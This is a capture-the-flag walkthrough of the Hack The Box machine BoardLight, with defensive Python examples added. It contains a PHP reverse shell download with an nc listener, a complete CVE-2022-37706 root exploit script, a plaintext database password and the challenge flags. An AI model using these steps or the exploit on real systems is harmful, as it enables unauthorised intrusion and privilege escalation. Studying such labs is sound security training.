Nmap Results
target="10.129.139.70"
sudo nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt $target
# Nmap 7.94SVN scan initiated Tue May 28 16:37:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.139.70
Nmap scan report for 10.129.139.70
Host is up (0.017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 28 16:38:20 2024 -- 1 IP address (1 host up) scanned in 42.58 seconds
Service Enumeration
TCP/80
echo -e '10.129.139.70\tboard.htb' | sudo tee -a /etc/hosts
Gobuster Enumeration
Directories and Files
gobuster dir -u http://board.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt -t 100 -o gobuster_80.txt
Virtual Hosts
# --domain : base domain of the target
# --append-domain : append the base domain to the end of every wordlist item
# -w : the wordlist to use
# -t : how many concurrent threads
# --delay : add a brief delay between requests to go easy on the server
# --exclude-length : the server responds with a length of 301 for invalid names
gobuster vhost -k --domain board.htb --append-domain -u http://10.129.139.70 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 --delay 10ms --exclude-length 301
Found: crm.board.htb Status: 200 [Size: 6360]
echo -e '10.129.139.70\tcrm.board.htb' | sudo tee -a /etc/hosts
CRM Enumeration
Recall from before that we saw an email address of info@board.htb, so that is one possible credential for the CRM. However, I did find that admin:admin allows us to log in as well.
Testing the Exploit
💡 Our admin user has the ability to create and edit sites and pages. The premise of the vulnerability is that the application attempts to block an unprivileged user from running PHP scripts by blocking <?php in the site source code. However, we can bypass the PHP code restriction by simply specifying an uppercase <?PHP tag.
❗ Note: There appears to be a cleanup script that runs to remove these pages at regular intervals, so if you see an error similar to below, just recreate the site and page and try again.
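To make the bypass concrete from the defender's side, here is an added example (not code from the original post and not Dolibarr's own filter) that puts a reconstruction of the case-sensitive check beside a hardened one. The function names `weak_filter_blocks` and `hardened_filter_blocks` and the sample page sources are assumptions constructed for the demo.

```python
import re

# Constructed sample page sources (not from the original post).
SAMPLES = {
    "plain_html": "<html><body><h1>Hello</h1></body></html>",
    "lowercase_tag": "<html><?php echo 'x'; ?></html>",
    "uppercase_tag": "<html><?PHP echo 'x'; ?></html>",
    "mixed_case_tag": "<html><?Php echo 'x'; ?></html>",
}


def weak_filter_blocks(source: str) -> bool:
    """Hypothetical reconstruction of the check the write-up describes: an exact,
    case-sensitive search for the lowercase string '<?php'. PHP itself treats the
    tag name case-insensitively, so '<?PHP' runs but is not caught here."""
    return "<?php" in source


def hardened_filter_blocks(source: str) -> bool:
    """Reject any '<?' sequence regardless of case. This catches every spelling of
    the open tag without enumerating them. It also blocks an XML prolog ('<?xml'),
    which is acceptable for an HTML site editor; allow-list that case explicitly
    if XML documents must pass."""
    return re.search(r"<\?", source) is not None


def audit(samples=SAMPLES):
    """Per sample, report whether each filter would block it, so the gap between
    the two checks is visible side by side."""
    return {
        name: {"weak": weak_filter_blocks(src), "hardened": hardened_filter_blocks(src)}
        for name, src in samples.items()
    }


if __name__ == "__main__":
    for name, verdict in audit().items():
        print(f"{name:16s} weak={verdict['weak']!s:5s} hardened={verdict['hardened']}")
```

The side-by-side output shows the uppercase and mixed-case samples slipping past the weak check while the hardened one rejects them. A blocklist is still the wrong layer for this control: the durable fix is to never let a site editor write files that the web server will execute as PHP, so that no tag spelling matters.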
Exploit
Reverse Shell
wget https://github.com/pentestmonkey/php-reverse-shell/raw/master/php-reverse-shell.php -O sh.php
nano sh.php
sudo rlwrap nc -lnvp 443
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Current User
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Sorry, user www-data may not run sudo on localhost.
Users and Groups
Local Users
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
Local Groups
adm:x:4:syslog,larissa
larissa:x:1000:
Network Configurations
Network Interfaces
eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:b9:89 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.32.44/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3421sec preferred_lft 3421sec
inet6 dead:beef::250:56ff:feb0:b989/64 scope global dynamic mngtmpaddr
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::250:56ff:feb0:b989/64 scope link
valid_lft forever preferred_lft forever
Open Ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
Interesting Files
/var/www/html/crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
Privilege Escalation
Dump the Database
During post-exploit enumeration we found the database credential for the dolibarr user in one of the configuration files.
💡 Configuration files are often a great first place to look when landing on a box, as they may contain credentials and other hard-coded information that helps us further our mission.
⚠️ I didn't have any luck cracking this hash, but it's also worth checking if the database password is reused as a user password.
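As an added example from the defender's side (not code from the original post or from Dolibarr), the following script parses the simple `$name='value';` assignments that a conf.php like the one above uses, flags the secret-bearing keys, and checks whether the file mode lets any local account read them. The file contents are a constructed excerpt that reuses the key names seen on the box with a placeholder password; the function names are assumptions.

```python
import os
import re
import stat
import tempfile

# Constructed conf.php excerpt: same key names as on the box, placeholder password.
SAMPLE_CONF = """<?php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='PLACEHOLDER-not-the-real-value';
"""

# One single-quoted PHP assignment per line; backslash escapes inside the value are kept.
ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", re.MULTILINE)
SECRET_HINTS = ("pass", "pwd", "secret", "token")


def parse_php_assignments(text):
    """Collect $name='value'; pairs from the text (single-quoted values only)."""
    return {m.group(1): m.group(2) for m in ASSIGN_RE.finditer(text)}


def find_hardcoded_secrets(text):
    """Return only the assignments whose variable name suggests a credential."""
    return {k: v for k, v in parse_php_assignments(text).items()
            if any(h in k.lower() for h in SECRET_HINTS)}


def is_world_readable(path):
    """True when the 'other' read bit is set, i.e. any local user can read the file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_conf_file(path):
    """Report the secret-bearing keys in a config file and whether its mode exposes them."""
    with open(path) as fh:
        secrets = find_hardcoded_secrets(fh.read())
    return {"secret_keys": sorted(secrets), "world_readable": is_world_readable(path)}


def demo():
    """Write the constructed excerpt to a temp file, audit it as 0644 and again after
    tightening to 0640 (owner plus the web server's group only)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "conf.php")
        with open(path, "w") as fh:
            fh.write(SAMPLE_CONF)
        os.chmod(path, 0o644)
        before = audit_conf_file(path)
        os.chmod(path, 0o640)
        after = audit_conf_file(path)
        return before, after


if __name__ == "__main__":
    print(demo())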
Lateral to Larissa
Create a SSH Key File for Persistence
Escalate to Root
Exploitation
The vulnerability occurs due to the way the enlightenment_sys component handles paths that start with /dev/.., as this causes a path traversal back to the system root and allows a malicious user to exploit a program in a writable path somewhere below the root / directory.
nano /tmp/pwn.sh
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
bash /tmp/pwn.sh
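The root cause above is a prefix check performed on the raw string before the path is canonicalised. The following added example (not code from the original post and not Enlightenment's code) shows that pattern beside a hardened check, using constructed paths; `naive_is_device_path` and `hardened_is_device_path` are hypothetical names, and the tightening of "/dev" handling is the author of this example's choice.

```python
import os

ALLOWED_PREFIX = "/dev/"


def naive_is_device_path(path: str) -> bool:
    """String-prefix check on the unnormalised path: the pattern the CVE-2022-37706
    description attributes to enlightenment_sys. '/dev/../tmp/x' passes because it
    begins with '/dev/' even though it names nothing under /dev."""
    return path.startswith(ALLOWED_PREFIX)


def hardened_is_device_path(path: str) -> bool:
    """Canonicalise first, compare second. normpath collapses '.' and '..'
    lexically and realpath then resolves symlinks, so the traversal folds away before
    the prefix is examined. A ';' or NUL is rejected outright because the write-up's
    script shows the path being spliced into a mount command line."""
    if ";" in path or "\0" in path:
        return False
    canonical = os.path.realpath(os.path.normpath(path))
    return canonical == "/dev" or canonical.startswith(ALLOWED_PREFIX)


def compare(paths):
    """Map each constructed path to (naive verdict, hardened verdict)."""
    return {p: (naive_is_device_path(p), hardened_is_device_path(p)) for p in paths}


if __name__ == "__main__":
    # Constructed inputs, not taken from the box.
    for p, (naive, hard) in compare(["/dev/null", "/dev/../tmp/x", "/tmp/x"]).items():
        print(f"{p:16s} naive={naive!s:5s} hardened={hard}")
```

Canonicalising before checking is the general lesson; for a setuid helper the stronger mitigation is to avoid building shell command lines from caller-controlled strings at all, and on a host like this one to update Enlightenment to a release that contains the fix (0.25.4 or later per the CVE record) or remove the setuid bit from enlightenment_sys if the desktop is not needed.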
Flags
User
b3e9e7d4e2f3671c35e6a49e2440fb98
Root
648dd6401e5ae0d7122776b67fed5724